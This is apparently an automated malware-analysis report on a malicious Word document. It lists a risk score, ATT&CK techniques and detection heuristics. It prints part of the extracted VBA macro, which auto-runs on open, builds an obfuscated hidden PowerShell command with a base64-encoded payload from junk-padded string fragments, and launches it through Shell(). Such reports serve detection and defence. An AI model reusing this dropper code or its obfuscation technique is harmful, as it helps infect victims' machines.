MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The Autoopen macro is triggered upon opening, which then calls the LnHfVTJFP function. This function uses the Shell() command to execute a command string, likely to download and execute a second-stage payload. The ClamAV detection also confirms its malicious nature.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6565825-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6565825-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18601 bytes |
SHA-256: bc116e7d42a2baa47e8868828169bf244a0c568966789eafd2c7d580c0405d8f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HKcqvGlswc" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function YbTCOY() On Error Resume Next HWMBI = Atn(86919 * CInt(4158) + 69176 - 72694) FkLnFR = 83156 + _ Log(7138) - iBYPE / Atn(68906) / kMwhQ / ptifv mzlWA = Atn(61999 * CInt(62137) + 53328 - 84434) afCip = 74969 + _ Log(98635) - HIRFIp / Atn(71362) / QwuRJ / VURYzi YbTCOY = zDCNjrr + snpESIqq + JBuanwGFZj + FAZtJsC + AIuAIBkPdJ + DWsiSGDswG + wAPqzVUOv + JhZuLLErNF + GLToSipOh jXILY = Atn(72885 * CInt(37050) + 59442 - 66106) CuvXn = 10939 + _ Log(63666) - vlwPjj / Atn(50180) / zJiQR / UKYkJu End Function Sub Autoopen() On Error Resume Next ERYhds = Atn(45236 * CInt(27887) + 5422 - 67027) kjBtb = 37095 + _ Log(77690) - lVmJwR / Atn(4359) / ZkzCw / HrTXiG LnHfVTJFP (YbTCOY) CowaUj = Atn(70631 * CInt(77056) + 52889 - 66679) whJOR = 15881 + _ Log(55374) - ajzdD / Atn(62867) / zZKZE / inihpi End Sub Function LnHfVTJFP(KIQLHl) On Error Resume Next kRYwCu = Atn(10880 * CInt(28252) + 57701 - 86414) LuRfI = 8968 + _ Log(20362) - uCjLdB / Atn(58026) / Ouahc / AfJHz TGoYwM = izWsG + Chr(vbKeyP) + NqppzcKoD IbDTjk = Atn(27443 * CInt(19060) + 38058 - 5142) dWvoaB = 11583 + _ Log(89696) - XarUDL / Atn(93657) / tlWAEi / TwQftn SAfVcXC = JcLLHV + Shell(bmIjLlXEXXM + TGoYwM + bwUcUP + KIQLHl + WYSqXKzIjd, vbHide) zLPwL = Atn(64103 * CInt(70887) + 51293 - 58452) MDDij = 67851 + _ Log(30601) - ncQij / Atn(59192) / nKVbl / BIDafE End Function Attribute VB_Name = "APATHSnB" Function zDCNjrr() On Error Resume Next djlaLb = Atn(10789 * CInt(37768) + 59365 - 36903) ZiGHFs = 62185 + _ Log(87455) - ZRllhQ / Atn(90765) / tojSzt / iBlXt MIJErPcJcB = "owersHeLL -Wi" + "nDowsTyle h" + "idden " + "-e KAAoACgAIg" + "B7ADYA" + "NwB9AHsANQ" + "AwAH0Aew" + "A5ADEAfQ" + "B7ADEAMgAzAH0" + "AewAy" Nwqblz = Atn(12351 * CInt(81834) + 32181 - 85918) TRVMu = 1586 + _ Log(86336) - jUaqmW / Atn(53432) / tZEGJA / LUuJv KwIzwK = "ADcAfQB7AD" + "YANgB9AHsANQA5A" + "H0AewAxADEAOAB9" + "AHsANAA2AH0Ae" + "wAxADEANQB9AHs" + "ANQAzAH0Ae" oucwa = Atn(97544 * CInt(62255) + 45014 - 1986) AscMdn = 13283 + _ Log(7919) - JOMRM / Atn(72992) / TQKrzr / drawtM YHTuldmvC = "wAxADQAfQB7AD" + "IAfQB7ADU" + "ANgB9AHsAOQA4" + "AH0Ae" + "wAxADEANA" vNslD = Atn(26791 * CInt(63363) + 76817 - 45214) NqElC = 54127 + _ Log(55506) - KdfPN / Atn(17900) / JvwUCp / rjOAT zCPMVlcZfS = "B9AHsAMgA2A" + "H0AewAxAD" + "AANgB9AHsANgA" + "yAH0AewA4A" + "DYAfQB7ADIA" + "OQB9AHsANAAxAH" IYQftl = Atn(58074 * CInt(18169) + 73834 - 22790) Pzijjt = 60990 + _ Log(662) - zuSiTV / Atn(67646) / wYWCI / HmMzWb DiirthZCij = "0AewAzAH0Ae" + "wAyAD" + "EAfQB7" + "ADEAOAB9AHs" + "AMgAwAH0Ae" + "wA0ADkAfQB" + "7ADMA" iWjXFE = Atn(13642 * CInt(55881) + 16134 - 75559) AkiNFh = 23811 + _ Log(46045) - dKNoY / Atn(14119) / azWtJ / ETXiL dzWhzDWRKvt = "MQB9AH" + "sANwAyAH0AewAxA" + "DAANQ" + "B9AHsAMwA3AH" QcXql = Atn(77228 * CInt(3697) + 45856 - 28627) jfnwYB = 37920 + _ Log(17358) - wzDjfl / Atn(88222) / bjOqW / wHaGU jMDFfdBi = "0AewA1AH0AewAx" + "ADMAfQB" + "7ADEAMg" + "A0AH0A" + "ewAxADEAMQB9" + "AHsANwA1A" + "H0AewAxADA" + "ANwB9AHsAMQA" + "yAH0Aew" AWjljR = Atn(83474 * CInt(11856) + 20365 - 99916) zOoMQ = 25441 + _ Log(91460) - ErOarA / Atn(6770) / Iorwv / jucORz JkRqV = "A0ADAA" + "fQB7ADkAMAB9AH" + "sANwA3AH0AewA2" + "AH0AewAxA" + "DEAOQ" + "B9AHsAMgAyAH" + "0AewAxADAANAB9" + "AHsAOQA3AH" + "0AewAxA" + "DAAMwB" unPbd = Atn(29375 * CInt(52612) + 65872 - 19555) tiNPlm = 92755 + _ Log(84103) - dHiRTB / Atn(14051) / iukBv / iKDzwO YIdCzTYT = "9AHsANAA" + "1AH0AewA" + "2ADEAfQB7AD" + "cAOAB9AHsAMQ" + "A3AH0AewAzADY" + "AfQB7AD" zDCNjrr = MIJErPcJcB + KwIzwK + YHTuldmvC + zCPMVlcZfS + DiirthZCij + dzWhzDWRKvt + jMDFfdBi + JkRqV + YIdCzTYT End Function Function snpESIqq() On Error Resume Next cbwGzT = Atn(64872 * CInt(68895) + 91162 - 15020) WfWHLW = 92192 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.